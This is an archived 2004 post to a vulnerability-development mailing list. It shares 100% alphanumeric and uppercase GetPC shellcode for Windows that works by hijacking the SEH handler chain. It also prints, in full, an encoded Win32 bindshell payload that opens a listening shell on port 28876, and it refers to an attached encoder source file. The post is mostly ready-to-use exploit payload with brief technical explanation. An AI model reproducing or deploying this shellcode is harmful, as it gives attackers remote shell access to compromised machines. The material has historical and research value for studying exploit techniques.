Vulnerability Development mailing list archives
Alphanumeric GetPC code. (was: GetPC code (was: Shellcode from ASCII))
From: "Berend-Jan Wever" <SkyLined () edup tudelft nl>
Date: Wed, 28 Jan 2004 16:58:49 +0100
Hi all, There was a thread about writing ASCII GetPC code about a half year ago on vuln-dev. I've been away a few months that's why I haven't written this mail earlier. I've developed 100% alphanumeric GetPC code for win NT/2K/XP based on work by Costin Ionescu: "VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089"; This code uses fs to get the current SEH address and overwrites it with a new SEH. Then it causes an exception, passing execution to the new SEH. This SEH can determine the location where the exception took place from the information provided about the exception by the OS. It then transfers execution back, passing the location of the code along in %ecx. Should work 100% of the time. I've also developed a 100% UPPERCASE alphanumeric GetPC code: "VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A63861816" ; This code will assume the start of the SEH chain is at the top of the stack and you have not used more then 65536 bytes of stack. (SEH @ 0xXXXXffe4 where XXXX is taken from %esp) The resulting address SHOULD point to the last SEH in the chain, which will be overwriten and then called by causing an exeception, just like the "normal" SEH GetPC. Because this code assumes you have not used more then 65535 bytes of stack or fucked up %esp and because it hyjacks the LAST SEH, (if an earlier SEH handles the exception, the code will not work!) this code will not work under some conditions. In addition to these GetPC codes, I've written an UPPERCASE alphanumeric shellcode en-/decoder, source is attached. The decoder works on any IA32/x86 system, regardless of OS/SP unlike the GetPC code which is windows specific. This will allow you to write OS/SP spanning uppercase alphanumeric shellcodes like this w32 bindshell (port 28876): VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A63861816II IIIIQZVTX630VX4A0B5HH0B20BBVX2BCBH4A2AC0ACTBCQB0ACAVX4Z8BCJOMNOASBLFFK8BTBSK HBTNPKHBWNAMJKHJ6JPJVN6NFBPB0JFCSDCPRFFJVGGCWDSOEFEKKA7GJJNPOJNFMBPBPB0IXONI HELA8NNB9A0BPBPFUJ6A0APBPBPKKDRMWKJM7JNLKBPBPB0ASBLBEBUBUB5BTBUBTB5KKHJEEF3I WJNHJBPB0BPI8HLACBLB5BEJVDPBPB7NLIHBNBULVB1B5HEKKAXFKNBPKJNLHB0BPB0ASBLB5HUK KCMLOJUKIJNNWBPBPBPJULFBQFUBEHUKKG4COH5HLJNNVBPB0BPJ6CVMFFVB0I8ANACKMB5BEBUC ECUJ6APA0BPB0CUCECECUCECECECECECULFF4I8HNB5EUCUCUCECUF5H5CUCUCEC4CEKTCEC5A5C EIXMOKKARBME0BMJNMRBPBPBPASBLJTKHFTFRFPKKCTKLMXOUJNNABPB0BPMUMEMUKKDQKFM6BMJ NOPB0BPBPA3BLBUIHMOKKIVMQD4LCJNB0BPBPBPHUGUK8EDN3K8FUE0JGAPLNDUK8DUB2APLNACB LACILATKXF3LXAPPNASOOALOLCQNJAPGLEHBLEWHOICOMEWLNLEKXLUF2APKNHFKHNPKTKHLENQA PKNKXFPKXAPJNOUP5OOBNZ Thanks: Costin Ionescu for the idear behind w32 SEH GetPC. HD Moore for the shellcodes and concepts at www.metasploit.com Greets: 0dd, #netric, (K)(L)(F) for Suzan Cheers, SkyLined -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGP 8.0 - not licensed for commercial use: www.pgp.com Comment: Berend-Jan Wever - skylined () edup tudelft nl mQGiBD//MyARBADnHLyg2lUBEddhdWAVBxovYU5PetLk2y3HZKguauHS6tT7sNPb WR4JuRZ5G9uTkgS/JlVl8jhdvAfOhAsXnlSwfBljPSt7ylHkmG/0TUQV14+OVIks joq80V2yGNT8oRGC/HMk6d20THXFsqiE8pLF5OVdcF0PpTP14OeavvWp2QCg/2Yb nk1i1VSjOCmPudJ+7klQbI0D/3pRkXQofpYslG7hBaEndDOVFRo9rgF5D4cbmIo0 eH9LEtzHiB+Q1wgJ2CUxWQeYtqCE5upBOl5vwnlY86vH6QdxZ7JdOhyWU2bgbb+D xZrWgE1LibVdqC6ow2NgmCTQhvnBVpuvrpfe50iohujCzzI4n8Vwolg4jQtCmsU/ 2glaA/9vM9T09rlq0CMQnwI3o1WPuyaVd2RrODo8AScKmYkukiuOCF7HSB//hGOX 1HXkM+yRi7ZtGVuX2sY2wkjiZa1OUuL28I5FInJQxoS8FuMtlEY2vqVHcw01KL3O NQPvVMNoieKM3hrLGUNTgvsiGEFZYzp908bvicGh3c1yrbo6XLQrQmVyZW5kLUph biBXZXZlciA8c2t5bGluZWRAZWR1cC50dWRlbGZ0Lm5sPokAWAQQEQIAGAUCP/8z IAgLCQgHAwIBCgIZAQUbAwAAAAAKCRDnF8rcdEbf3T07AKDQp2C/tLe5X8v1iUBa TlEogOUvrQCg7SHA3QPk2f/6wnl9sqhADvXdS1W5Ag0EP/8zIBAIAPZCV7cIfwgX cqK61qlC8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyD vWXpF9Sh01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5 u/2RXscBqtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98 iLMcfFstjvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlA GBGNfISnCnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqr ol7DVekyCzsAAgIIAPBwtE5Q5qtEuK/1a7rNrHvRTpgTJpw9P6B61TfGACiucXne Xo28DbabGuD8yfiNaXTHKt9NAtfHxVTL1hFUIfK5dZ9o6FG4pJFZtXfjmGqoac6A G2zBNWNAr26OqoEKrFohJyJ8rcIY+FKrH5axaBc9II5cxcQebWoFXU/tGq+4yVaZ 4669mfHBSfiThe4N1hlcrlcehxUe3QFZYmQHYClXpldY0t3/N71k5jd6a1NZ5j9Z kfTBzXTtbKERt1mM9gptU4LjGJQFoNBw6dRj+IQc4wJG6nAmKaQpOwMdPnii8Kz1 i+MRkW92vt8bfcXqA38XcASI5iqKmQCSSYoBW0qJAEwEGBECAAwFAj//MyAFGwwA AAAACgkQ5xfK3HRG391CBgCffzGf174a1bKMu4EbOFfrD9eyj90An14tyn0tPGg5 IlutbA2EL52jJYz2 =OpSl -----END PGP PUBLIC KEY BLOCK-----
Attachment:
ALPHA_04.c
Description:
Current thread:
- Alphanumeric GetPC code. (was: GetPC code (was: Shellcode from ASCII)) Berend-Jan Wever (Jan 28)